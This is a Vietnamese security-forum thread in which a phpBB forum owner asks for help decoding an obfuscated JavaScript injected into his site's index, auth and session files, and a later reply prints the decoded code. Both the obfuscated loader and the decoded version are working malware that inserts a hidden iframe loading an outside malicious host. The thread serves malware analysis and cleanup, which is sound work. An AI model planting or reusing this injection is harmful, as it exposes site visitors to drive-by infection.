banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận bảo mật Xin các anh giúp giải mã đoạn script phá hoại này  XML
  [Question]   Xin các anh giúp giải mã đoạn script phá hoại này 28/08/2011 21:34:40 (+0700) | #1 | 246093
whitesnow19
Member

[Minus]    0    [Plus]
Joined: 08/10/2010 03:42:19
Messages: 54
Offline
[Profile] [PM]
Tình hình em lập cái diễn đàn phpBB tại x10hosting.com. Mấy ngày trước không vấn đề gì. Hôm nay em truy cập thì thấy diễn đàn báo lỗi. Em vô host thì thấy file index, auth, session bị thay đổi nội dung. Cụ thể có một đoạn mã script đã được chèn vào đầu mỗi file mà em không biết nó có ý nghĩa gì.
Code:
<script>String.prototype.asd=function(){return String['fromCharCode'];};Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('s'+'d'))throw 1;}catch(q){zxc={}[i];}v=document.createTextNode('asd');var s="";try{eval('asdvds');}catch(q){for(i in v)r=v.childNodes.length+1}r*=2;e=eval;m=[11-r,11-r,107-r,104-r,34-r,42-r,102-r,113-r,101-r,119-r,111-r,103-r,112-r,118-r,48-r,105-r,103-r,118-r,71-r,110-r,103-r,111-r,103-r,112-r,118-r,117-r,68-r,123-r,86-r,99-r,105-r,80-r,99-r,111-r,103-r,42-r,41-r,100-r,113-r,102-r,123-r,41-r,43-r,93-r,50-r,95-r,43-r,125-r,11-r,11-r,11-r,107-r,104-r,116-r,99-r,111-r,103-r,116-r,42-r,43-r,61-r,11-r,11-r,127-r,34-r,103-r,110-r,117-r,103-r,34-r,125-r,11-r,11-r,11-r,102-r,113-r,101-r,119-r,111-r,103-r,112-r,118-r,48-r,121-r,116-r,107-r,118-r,103-r,42-r,36-r,62-r,107-r,104-r,116-r,99-r,111-r,103-r,34-r,117-r,116-r,101-r,63-r,41-r,106-r,118-r,118-r,114-r,60-r,49-r,49-r,111-r,99-r,117-r,103-r,113-r,107-r,51-r,110-r,54-r,104-r,48-r,101-r,50-r,111-r,48-r,110-r,107-r,49-r,107-r,49-r,104-r,118-r,118-r,114-r,114-r,52-r,57-r,120-r,103-r,101-r,106-r,103-r,116-r,41-r,34-r,121-r,107-r,102-r,118-r,106-r,63-r,41-r,51-r,50-r,41-r,34-r,106-r,103-r,107-r,105-r,106-r,118-r,63-r,41-r,51-r,50-r,41-r,34-r,117-r,118-r,123-r,110-r,103-r,63-r,41-r,120-r,107-r,117-r,107-r,100-r,107-r,110-r,107-r,118-r,123-r,60-r,106-r,107-r,102-r,102-r,103-r,112-r,61-r,114-r,113-r,117-r,107-r,118-r,107-r,113-r,112-r,60-r,99-r,100-r,117-r,113-r,110-r,119-r,118-r,103-r,61-r,110-r,103-r,104-r,118-r,60-r,50-r,61-r,118-r,113-r,114-r,60-r,50-r,61-r,41-r,64-r,62-r,49-r,107-r,104-r,116-r,99-r,111-r,103-r,64-r,36-r,43-r,61-r,11-r,11-r,127-r,11-r,11-r,104-r,119-r,112-r,101-r,118-r,107-r,113-r,112-r,34-r,107-r,104-r,116-r,99-r,111-r,103-r,116-r,42-r,43-r,125-r,11-r,11-r,11-r,120-r,99-r,116-r,34-r,104-r,34-r,63-r,34-r,102-r,113-r,101-r,119-r,111-r,103-r,112-r,118-r,48-r,101-r,116-r,103-r,99-r,118-r,103-r,71-r,110-r,103-r,111-r,103-r,112-r,118-r,42-r,41-r,107-r,104-r,116-r,99-r,111-r,103-r,41-r,43-r,61-r,104-r,48-r,117-r,103-r,118-r,67-r,118-r,118-r,116-r,107-r,100-r,119-r,118-r,103-r,42-r,41-r,117-r,116-r,101-r,41-r,46-r,41-r,106-r,118-r,118-r,114-r,60-r,49-r,49-r,111-r,99-r,117-r,103-r,113-r,107-r,51-r,110-r,54-r,104-r,48-r,101-r,50-r,111-r,48-r,110-r,107-r,49-r,107-r,49-r,104-r,118-r,118-r,114-r,114-r,52-r,57-r,120-r,103-r,101-r,106-r,103-r,116-r,41-r,43-r,61-r,104-r,48-r,117-r,118-r,123-r,110-r,103-r,48-r,120-r,107-r,117-r,107-r,100-r,107-r,110-r,107-r,118-r,123-r,63-r,41-r,106-r,107-r,102-r,102-r,103-r,112-r,41-r,61-r,104-r,48-r,117-r,118-r,123-r,110-r,103-r,48-r,114-r,113-r,117-r,107-r,118-r,107-r,113-r,112-r,63-r,41-r,99-r,100-r,117-r,113-r,110-r,119-r,118-r,103-r,41-r,61-r,104-r,48-r,117-r,118-r,123-r,110-r,103-r,48-r,110-r,103-r,104-r,118-r,63-r,41-r,50-r,41-r,61-r,104-r,48-r,117-r,118-r,123-r,110-r,103-r,48-r,118-r,113-r,114-r,63-r,41-r,50-r,41-r,61-r,104-r,48-r,117-r,103-r,118-r,67-r,118-r,118-r,116-r,107-r,100-r,119-r,118-r,103-r,42-r,41-r,121-r,107-r,102-r,118-r,106-r,41-r,46-r,41-r,51-r,50-r,41-r,43-r,61-r,104-r,48-r,117-r,103-r,118-r,67-r,118-r,118-r,116-r,107-r,100-r,119-r,118-r,103-r,42-r,41-r,106-r,103-r,107-r,105-r,106-r,118-r,41-r,46-r,41-r,51-r,50-r,41-r,43-r,61-r,11-r,11-r,11-r,102-r,113-r,101-r,119-r,111-r,103-r,112-r,118-r,48-r,105-r,103-r,118-r,71-r,110-r,103-r,111-r,103-r,112-r,118-r,117-r,68-r,123-r,86-r,99-r,105-r,80-r,99-r,111-r,103-r,42-r,41-r,100-r,113-r,102-r,123-r,41-r,43-r,93-r,50-r,95-r,48-r,99-r,114-r,114-r,103-r,112-r,102-r,69-r,106-r,107-r,110-r,102-r,42-r,104-r,43-r,61-r,11-r,11-r,127-r];mm='a'.asd();for(i=0;i<m.length;i++)s+=mm(e("m"+"["+"i"+"]"));e(s);</script>
Mong các anh giúp sức.
[Up] [Print Copy]
  [Question]   Xin các anh giúp giải mã đoạn script phá hoại này 28/08/2011 21:45:10 (+0700) | #2 | 246096
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]
Đọc kỹ quy định của x10hosting, đa số các free hosting thường tự động chèn các đoạn quảng cáo vào website của khách hàng.
[Up] [Print Copy]
  [Question]   Xin các anh giúp giải mã đoạn script phá hoại này 28/08/2011 21:54:55 (+0700) | #3 | 246098
whitesnow19
Member

[Minus]    0    [Plus]
Joined: 08/10/2010 03:42:19
Messages: 54
Offline
[Profile] [PM]
Thưa anh, x10hosting không chèn quảng cáo! em vừa đọc lại term của nó xong và edit lại bài viết này.
[Up] [Print Copy]
  [Question]   Xin các anh giúp giải mã đoạn script phá hoại này 29/08/2011 10:16:18 (+0700) | #4 | 246133
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]
Theo một số website thì đây là sâu XSS, chưa có tài liệu cụ thể về thằng này. để mình nghiên cứu thêm

Copy bỏ vào localhost Avira báo liền tên em virus này là JS/iFrame.GT.4

Bro nghiên cứu thêm nhé
[Up] [Print Copy]
  [Question]   Xin các anh giúp giải mã đoạn script phá hoại này 29/08/2011 18:03:16 (+0700) | #5 | 246155
[Avatar]
chiro8x
Member

[Minus]    0    [Plus]
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
[Profile] [PM] [Yahoo!]
File nào bị thay đổi ! thay đổi như thế nào ? PhpBB bản mấy, line mấy bị thay đổi vào ngày nào =.=! Check create time và modify.
while(1){}
[Up] [Print Copy]
  [Question]   Xin các anh giúp giải mã đoạn script phá hoại này 29/08/2011 18:51:46 (+0700) | #6 | 246160
Rolex0210
Member

[Minus]    0    [Plus]
Joined: 17/04/2010 07:54:57
Messages: 9
Offline
[Profile] [PM]

chiro8x wrote:
File nào bị thay đổi ! thay đổi như thế nào ? PhpBB bản mấy, line mấy bị thay đổi vào ngày nào =.=! Check create time và modify. 


Cậu có đọc kỹ câu hỏi của người ta chưa mà phang vào mấy câu ở trên vậy ? còn dùng dấu ! nữa smilie
[Up] [Print Copy]
  [Question]   Xin các anh giúp giải mã đoạn script phá hoại này 30/08/2011 14:24:54 (+0700) | #7 | 246220
whitesnow19
Member

[Minus]    0    [Plus]
Joined: 08/10/2010 03:42:19
Messages: 54
Offline
[Profile] [PM]
PhpBB ver 3.0.9 download từ trang chủ phpbb. Hiện tại đã ổn định nhưng không biết sau này có bị lại không. Mong các anh giúp đỡ
[Up] [Print Copy]
  [Question]   Xin các anh giúp giải mã đoạn script phá hoại này 31/12/2011 02:25:43 (+0700) | #8 | 251693
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]
Sau khi giải mã đoạn Javascript độc hại trên, mình ra được đoạn mã gốc sau:
Code:
if (document.getElementsByTagName('body')[0])
 {
   iframer();
 }
 else
 {
   document.write("<iframe src='http://maseoi1l4f.c0m.li/i/fttpp27vecher' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
 }
 function iframer()
 {
   var f = document.createElement('iframe');
   f.setAttribute('src','http://maseoi1l4f.c0m.li/i/fttpp27vecher');
   f.style.visibility='hidden';
   f.style.position='absolute';
   f.style.left='0';
   f.style.top='0';
   f.setAttribute('width','10');
   f.setAttribute('height','10');
   document.getElementsByTagName('body')[0].appendChild(f);
 }
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|